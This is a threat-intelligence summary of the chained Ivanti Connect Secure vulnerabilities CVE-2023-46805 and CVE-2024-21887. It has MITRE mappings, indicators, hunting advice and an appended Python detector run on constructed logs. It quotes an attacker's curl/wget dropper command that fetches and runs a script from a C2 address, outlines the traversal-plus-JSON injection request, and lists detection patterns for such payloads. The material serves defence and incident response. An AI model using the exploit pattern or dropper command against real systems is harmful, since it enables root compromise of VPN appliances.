Keypoints
- Two zero-days—CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection)—affect Ivanti Connect Secure 9.x and 22.x and can be combined for unauthenticated root RCE.
- Exploitation is a single crafted HTTP POST: a path-traversal sequence in the URL (CVE-2023-46805) reaches an API endpoint that should require authentication, and the JSON body's “type” value (CVE-2024-21887) carries shell commands that the appliance executes as root.
- Common payloads observed include a Python reverse shell (default Python on appliance) and wget/curl-downloadable .sh scripts that install crypto-miners (xmrig) or other tooling.
- Post-exploitation behaviors include outgoing curl requests to C2, SSH connections to internal hosts, and established encrypted external connections; persistence via a modified visits.py web shell (GIFTEDVISITOR) was observed.
- Researchers observed widespread compromise and public PoC/tooling in the wild (including a Metasploit module); Ivanti released mitigations and began issuing patches starting January 22, 2024.
- Key forensic artifacts and modified files were identified (examples under /home and /tmp) and should be checked during incident response and hunting.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Exploit is delivered by a crafted HTTP request to the VPN appliance (‘The attack is carried out by sending a carefully crafted request to the ICS appliance.’)
- [T1059] Command and Scripting Interpreter – Shell commands are supplied inside JSON and executed on the target (‘Next, JSON data is sent which under the “type:” key contains a shell command which will be executed on the victim.’)
- [T1105] Ingress Tool Transfer – Payloads and scripts are fetched via curl or wget and executed (‘…type curl >&/dev/null; curl -o /tmp/script.sh http://192.252.183[.]116:8089/… || type wget >&/dev/null; wget -O /tmp/script.sh http://192.252.183[.]116:8089/…; chmod +x /tmp/script.sh; /tmp/script.sh’)
- [T1071] Application Layer Protocol – Post-compromise traffic includes outbound curl requests to C2 over HTTP and a Python reverse shell to an attacker-controlled IP/port (‘the Python code executes and sends a reverse shell back to the attacker’s IP address and port’)
- [T1505.003] Server Software Component: Web Shell – Persistence achieved by modifying the legitimate visits.py component to embed a web shell called GIFTEDVISITOR (‘modifying a legitimate Ivanti component “visits.py” and incorporating malicious code which functions as a web shell. This code dubbed GIFTEDVISITOR is called and executed when the following URI is accessed: “/api/v1/cav/client/visits”’)
- [T1021.004] Remote Services: SSH – Lateral movement observed as SSH connections from the appliance to other internal systems (‘SSH connections to other internal systems’)
Indicators of Compromise
- [IP Address] exploit and C2 contexts – 192.252.183[.]116 (hosts the dropper/miner script and serves as C2), 65.130.146 (listed as a network IoC; the value is incomplete as given)
- [Domain] C2/hostnames – psecure[.]pro (listed network IoC)
- [File name / script] payloads and miner installer – d9a10f4568b649acae7bc2fe51fb5a98.sh (mining script), /tmp/script.sh (downloaded installer)
- [File paths] modified system and webserver artifacts – /home/webserver/htdocs/dana-na/auth/compcheckresult.cgi, /home/perl/DSLogConfig.pm, /tmp/s.py (examples of modified/created files)
- [Web shell] persistence artifact – GIFTEDVISITOR web shell invoked at /api/v1/cav/client/visits
Exploitation procedure and technical summary:
Two linked vulnerabilities in Ivanti Connect Secure (CVE-2023-46805, an authentication bypass, and CVE-2024-21887, a command injection) allow an unauthenticated attacker to send a specially crafted HTTP POST to a vulnerable appliance. The request URL contains a directory-traversal sequence that resolves to a restricted endpoint (the observed pattern starts under /api/v1/totp/user-backup-code/ and climbs into /license/keys-status), which satisfies the bypass. The JSON body's “type” field then carries a shell command that the appliance executes. Because Python is present on the appliance by default, many observed exploits execute a Python reverse shell to an attacker-controlled IP/port. Public PoCs are simple curl one-liners or short Python scripts that POST the payload and trigger execution, returning privileged output such as uid=0(root).
Common post-exploitation steps seen in the wild include downloading and executing shell scripts via curl or wget (typically written to /tmp), which install crypto-miners (xmrig) or other tooling, and opening outbound reverse shells to command-and-control. Attackers establish persistence by modifying Ivanti components (notably visits.py) to embed a web shell (GIFTEDVISITOR) reachable through the /api/v1/cav/client/visits endpoint. Observed post-compromise network behaviors include outbound curl requests to C2, SSH connections from the appliance to internal hosts, and encrypted connections to external servers; these are the primary detection signals for hunting and response.
For response and hunting, search for the exploitation URL patterns (e.g., requests containing /api/v1/totp/user-backup-code/../../ and /license/keys-status, including percent-encoded variants of the traversal), unexpected POSTs whose JSON body carries shell syntax in the “type” value, outbound connections to the listed network indicators (e.g., 192.252.183[.]116, psecure[.]pro), and new or modified files under /home/webserver/htdocs and /tmp (e.g., compcheckresult.cgi, visits.py, /tmp/s.py). Because /api/v1/cav/client/visits is a legitimate API path, a request to it is not by itself evidence of GIFTEDVISITOR; verify the integrity of visits.py directly rather than relying on URI hits alone. Apply vendor mitigations and the official patches provided by Ivanti; review logs for the indicators above and inspect for lateral movement from any compromised appliance.
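The hunting checks described above, as an added example that is not part of the original report or any Ivanti tooling. It assumes two constructed inputs: a request-log export with one JSON object per request (method, URI, raw body) and a list of outbound connections from the appliance in the form "src -> dst:port". The indicator values come from the IoC list on this page; the sample log lines, the internal 10.x prefix, and the finding tags are assumptions made for the example. The traversal check goes slightly beyond the text by decoding repeatedly, so double-encoded sequences such as ..%252F are caught too.

```python
import json
import posixpath
import re
from urllib.parse import unquote

# Indicators from the report's IoC list, refanged for matching.
IOC_IPS = {s.replace("[.]", ".") for s in ("192.252.183[.]116",)}
IOC_DOMAINS = {s.replace("[.]", ".") for s in ("psecure[.]pro",)}
# URL prefix the traversal starts from and the restricted path it reaches.
TRAVERSAL_PREFIX = "/api/v1/totp/user-backup-code"
RESTRICTED_SUFFIXES = ("/license/keys-status",)
# Legitimate endpoint that a modified visits.py (GIFTEDVISITOR) answers on.
WEBSHELL_URI = "/api/v1/cav/client/visits"
# Shell syntax that has no business inside a JSON "type" value.
SHELL_META = re.compile(r"[;|&`]|\$\(")
# curl/wget dropper writing a script into /tmp, as in the report's quote.
DROPPER = re.compile(r"\b(curl|wget)\b.*/tmp/\S+\.sh")
CONN = re.compile(r"^(?P<src>\S+) -> (?P<dst>[^:\s]+):(?P<port>\d+)$")


def decode_uri(uri: str) -> str:
    """Percent-decode until stable so encoded '..%2F' (or '%252F') resolves."""
    prev = None
    while prev != uri:
        prev, uri = uri, unquote(uri)
    return uri


def resolve_path(uri: str) -> tuple:
    """Return (decoded path, path with '..' segments collapsed)."""
    path = decode_uri(uri.split("?", 1)[0])
    return path, posixpath.normpath(path)


def command_from_type(body: str):
    """Return the JSON "type" value if it contains shell syntax, else None."""
    try:
        data = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        return None
    value = data.get("type") if isinstance(data, dict) else None
    if isinstance(value, str) and SHELL_META.search(value):
        return value
    return None


def analyze_request(rec: dict) -> list:
    """Return (tag, detail) findings for one logged request."""
    findings = []
    raw, resolved = resolve_path(rec["uri"])
    if "/.." in raw and raw != resolved:
        findings.append(("traversal", f"{rec['uri']} -> {resolved}"))
        if raw.startswith(TRAVERSAL_PREFIX) and resolved.endswith(RESTRICTED_SUFFIXES):
            findings.append(("auth-bypass", "CVE-2023-46805 pattern"))
    cmd = command_from_type(rec.get("body", ""))
    if cmd:
        findings.append(("cmd-injection", f"CVE-2024-21887 type={cmd!r}"))
        if DROPPER.search(cmd):
            findings.append(("dropper", "curl/wget fetch of a /tmp script"))
        for ip in IOC_IPS:
            if ip in cmd:
                findings.append(("ioc-ip", ip))
    if resolved == WEBSHELL_URI:
        # Legitimate API path too: flag for review, not as proof of a web shell.
        findings.append(("webshell-uri", "review visits.py integrity"))
    return findings


def analyze_connection(line: str, internal_prefix: str = "10.") -> list:
    """Flag outbound traffic to listed IoCs and appliance-originated SSH."""
    m = CONN.match(line.strip())
    if not m:
        return []
    dst, port = m["dst"], int(m["port"])
    if dst in IOC_IPS or dst in IOC_DOMAINS:
        return [("ioc-net", f"{dst}:{port}")]
    if port == 22 and dst.startswith(internal_prefix):
        return [("internal-ssh", dst)]
    return []


# Constructed sample data (not real traffic) exercising each check.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "method": "POST",
     "uri": "/api/v1/totp/user-backup-code/../../license/keys-status/",
     "body": '{"type": ";id;"}'},
    {"src": "203.0.113.7", "method": "POST",
     "uri": "/api/v1/totp/user-backup-code/..%252F..%252Flicense/keys-status/",
     "body": '{"type": ";type curl >&/dev/null; curl -o /tmp/script.sh '
             'http://192.252.183.116:8089/d9a10f4568b649acae7bc2fe51fb5a98.sh; '
             'chmod +x /tmp/script.sh; /tmp/script.sh;"}'},
    {"src": "198.51.100.9", "method": "GET",
     "uri": "/dana-na/auth/url_default/welcome.cgi", "body": ""},
    {"src": "203.0.113.7", "method": "GET", "uri": WEBSHELL_URI, "body": ""},
]
SAMPLE_CONNECTIONS = [
    "10.0.0.5 -> 192.252.183.116:8089",
    "10.0.0.5 -> psecure.pro:443",
    "10.0.0.5 -> 10.0.0.22:22",
    "10.0.0.5 -> 10.0.0.3:389",
]


def hunt(requests=SAMPLE_REQUESTS, connections=SAMPLE_CONNECTIONS) -> dict:
    """Run both analyzers and keep only entries that produced findings."""
    return {
        "requests": [(i, f) for i, r in enumerate(requests) if (f := analyze_request(r))],
        "connections": [(c, f) for c in connections if (f := analyze_connection(c))],
    }


if __name__ == "__main__":
    for section, hits in hunt().items():
        for key, findings in hits:
            print(section, key, findings)
```

The request analyzer resolves the path before comparing it, so it reports what the traversal actually reached rather than matching on a literal "../" string; the connection analyzer treats a hit on a listed indicator as high confidence and SSH from the appliance to an internal host as a lead to chase, which mirrors the distinction the report draws between direct IoCs and behavioral signals.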